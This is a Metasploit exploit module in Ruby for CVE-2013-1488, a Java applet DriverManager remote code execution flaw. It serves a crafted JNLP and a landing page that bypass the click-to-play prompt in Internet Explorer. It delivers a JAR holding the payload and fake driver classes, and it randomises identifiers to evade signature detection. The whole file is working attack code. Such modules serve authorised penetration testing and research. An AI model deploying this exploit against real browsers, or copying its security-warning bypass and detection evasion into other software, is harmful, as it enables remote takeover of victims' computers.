
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/java_jre17_driver_manager.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
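class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  #include Msf::Exploit::Remote::BrowserAutopwn
  #autopwn_info({ :javascript => false })

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java Applet Driver Manager Privileged toString() Remote Code Execution',
      'Description'    => %q{
        This module abuses the java.sql.DriverManager class where the toString() method
        is called over user supplied classes from a doPrivileged block. The vulnerability
        affects Java version 7u17 and earlier. This exploit bypasses click-to-play on Internet Explorer
        and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java
        Web Start can be launched automatically through the ActiveX control. Otherwise, the
        applet is launched without click-to-play bypass.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'James Forshaw', # Vulnerability discovery and Analysis
          'juan vazquez'   # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1488' ],
          [ 'OSVDB', '91472' ],
          [ 'BID', '58504' ],
          [ 'URL', 'http://www.contextis.com/research/blog/java-pwn2own/' ],
          [ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ],
          [ 'ZDI', '13-076' ]
        ],
      'Platform'       => %w{ java linux osx win },
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch'     => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch'     => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2013-01-10'
    ))
  end

  # Loads the precompiled exploit artifacts from the framework data directory
  # and randomises the identifiers that would otherwise be static signatures
  # (the exploit class name and the JNLP file name).
  #
  # Raises Errno::ENOENT (from File.binread) if any artifact is missing, so a
  # broken install fails at setup rather than while serving the victim.
  def setup
    @exploit_class   = read_data_file('Exploit.class')
    @driver_class    = read_data_file('FakeDriver.class')
    @driver2_class   = read_data_file('FakeDriver2.class')
    @object_services = read_data_file('META-INF', 'services', 'java.lang.Object')
    @driver_services = read_data_file('META-INF', 'services', 'java.sql.Driver')

    # The new name must have exactly the same length as "Exploit": the
    # substitution is done on the raw compiled class bytes, and class-file
    # string constants are length-prefixed, so a different length would
    # corrupt the class.
    @exploit_class_name = rand_text_alpha('Exploit'.length)
    @exploit_class.gsub!('Exploit', @exploit_class_name)

    @jnlp_name = rand_text_alpha(8)

    super
  end

  # Builds the JNLP descriptor that Java Web Start launches. All free-form
  # fields are randomised per request; only the structure is fixed.
  #
  # @return [String] the JNLP XML document
  def jnlp_file
    jnlp = %Q|
      <?xml version="1.0" encoding="utf-8"?>
      <jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}">
        <information>
          <title>Applet Test JNLP</title>
          <vendor>#{rand_text_alpha(8)}</vendor>
          <description>#{rand_text_alpha(8)}</description>
          <offline-allowed/>
        </information>

        <resources>
          <j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" />
          <jar href="#{rand_text_alpha(8)}.jar" main="true" />
        </resources>
        <applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1">
          <param name="__applet_ssv_validated" value="true"></param>
        </applet-desc>
        <update check="background"/>
      </jnlp>
    |
    # NOTE(review): the __applet_ssv_validated parameter above is presumably
    # the "specially crafted" part that suppresses the security warning (see
    # the Immunity reference); the rest of the file is a plain applet JNLP.
    return jnlp
  end

  # Dispatches each HTTP request from the victim browser: the JNLP descriptor,
  # the exploit JAR, the landing page, or a redirect to the landing page.
  #
  # @param cli [Rex::Socket] the client connection to respond on
  # @param request [Rex::Proto::Http::Request] the parsed request
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jnlp$/i
      send_response(cli, jnlp_file, { 'Content-Type' => 'application/x-java-jnlp-file' })
    when /\.jar$/i
      # Any .jar name is served, since the JNLP and the <applet> tag each
      # reference a freshly randomised archive name.
      send_response(cli, exploit_jar, { 'Content-Type' => 'application/octet-stream' })
    when /\/$/
      # Named so as not to shadow the `payload` method used by exploit_jar.
      regenerated = regenerate_payload(cli)
      unless regenerated
        print_error('Failed to generate the payload.')
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Landing page. On IE the Java ActiveX control referenced by the classid
  # launches the JNLP through Java Web Start, which is what bypasses
  # click-to-play; other browsers fall back to the nested <applet> tag, which
  # gets no click-to-play bypass (see the module Description).
  #
  # @return [String] the HTML document
  def generate_html
    html = %Q|
      <html>
      <body>
        <object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>
          <param name="app" value="#{jnlp_uri}">
          <param name="back" value="true">
          <applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
        </object>
      </body>
      </html>
    |
    return html
  end

  private

  # Reads one artifact from data/exploits/cve-2013-1488/ as binary.
  #
  # @param parts [Array<String>] path components below the exploit data dir
  # @return [String] the raw file contents (ASCII-8BIT)
  def read_data_file(*parts)
    File.binread(File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-1488', *parts))
  end

  # Absolute URI of the JNLP descriptor; referenced from both the JNLP's own
  # href and the IE <object> launcher, so it is computed in one place.
  def jnlp_uri
    "#{get_uri}/#{@jnlp_name}.jnlp"
  end

  # Assembles the JAR served to the victim: the encoded Java payload stage plus
  # the exploit class, the two fake drivers and the META-INF service
  # descriptors through which DriverManager is expected to discover them.
  #
  # @return [Rex::Zip::Jar] the finished archive (manifest already built)
  def exploit_jar
    jar = payload.encoded_jar
    jar.add_file("#{@exploit_class_name}.class", @exploit_class)
    jar.add_file('FakeDriver.class', @driver_class)
    jar.add_file('FakeDriver2.class', @driver2_class)
    jar.add_file('META-INF/services/java.lang.Object', @object_services)
    jar.add_file('META-INF/services/java.sql.Driver', @driver_services)

    # Rewrite the stock "metasploit"/"Payload" identifiers in every entry name
    # and body so the archive does not carry those well-known strings. The
    # replacements are the same length as the originals because the rewrite
    # is applied to compiled class bytes (length-prefixed constants).
    metasploit_str = rand_text_alpha('metasploit'.length)
    payload_str    = rand_text_alpha('Payload'.length)
    jar.entries.each do |entry|
      entry.name.gsub!('metasploit', metasploit_str)
      entry.name.gsub!('Payload', payload_str)
      entry.data = entry.data.gsub('metasploit', metasploit_str)
      entry.data = entry.data.gsub('Payload', payload_str)
    end
    jar.build_manifest

    jar
  end
end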